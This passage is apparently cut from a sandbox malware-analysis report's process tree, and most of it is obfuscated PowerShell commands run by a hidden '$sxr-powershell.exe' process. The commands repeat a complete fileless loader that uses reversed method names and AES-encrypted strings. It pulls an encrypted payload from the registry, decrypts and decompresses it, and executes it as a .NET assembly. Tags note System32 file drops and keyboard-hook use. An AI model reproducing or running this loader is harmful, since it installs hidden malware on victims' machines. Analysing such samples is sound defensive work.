$BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:8432
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:8836
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        26⤵
        
        PID:8212
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8432).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = 